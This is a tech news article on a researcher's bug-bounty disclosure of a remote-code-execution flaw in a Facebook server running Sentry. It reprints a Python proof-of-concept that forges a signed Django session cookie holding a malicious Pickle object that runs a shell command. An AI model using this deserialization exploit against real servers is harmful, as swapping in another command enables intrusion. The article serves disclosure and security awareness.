Now that's a fortune cookie! Facebook splats $5k command-injection bug in one of its servers
Find flaw, report flaw, fix flaw, get paid. Bish, bash, bosh
Facebook has patched a remote-code execution flaw discovered in one of its servers.
Researcher Daniel 'Blaklis' Le Gall, of SCRT Information Security, said on Friday he bagged a $5,000 bug bounty from the social network for reporting a flaw that could be exploited to execute arbitrary commands using malicious cookies.
Though remote code execution bugs are considered serious problems, Le Gall noted that no Facebook user data was ever exposed or accessed via the uncovered hole. The bug was patched this month prior to today's disclosure.
The programming blunder was spotted in a Facebook server running the Sentry log collection software.
"While I was looking at the application, some stacktraces regularly popped on the page, for an unknown reason," Le Gall explained. "The application seemed to be unstable regarding the user password reset feature, which occasionally crashed."
Looking through the logs, the researcher noted that he was able see where in the stack the cookie details were handled, as well as spot where the application was using Pickle, a Python data serialization protocol that can be vulnerable to manipulation.
With that information, Le Gall was able to craft cookies that would run commands on the machine. Here is the proof-of-concept exploit – a simple cookie that will tell the server to ping back a response with a 30-second delay:
#!/usr/bin/python import django.core.signing, django.contrib.sessions.serializers from django.http import HttpResponse import cPickle import os SECRET_KEY='[RETRIEVEDKEY]' #Initial cookie I had on sentry when trying to reset a password cookie='gAJ9cQFYCgAAAHRlc3Rjb29raWVxAlgGAAAAd29ya2VkcQNzLg:1fjsBy:FdZ8oz3sQBnx2TPyncNt0LoyiAw' newContent = django.core.signing.loads(cookie,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies') class PickleRce(object): def __reduce__(self): return (os.system,("sleep 30",)) newContent['testcookie'] = PickleRce() print django.core.signing.dumps(newContent,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies',compress=True)
Say what you will about Facebook, but the company's handling of bug reports appears to be on point. Le Gall said that the the same day the flaw was reported, July 30, Facebook took down the server. Ten days later, a patch was in place and the server was brought back online.
The social network has made security a focal point in the aftermath of the Cambridge Analytica scandal, and in this case at least it appears to be paying off. ®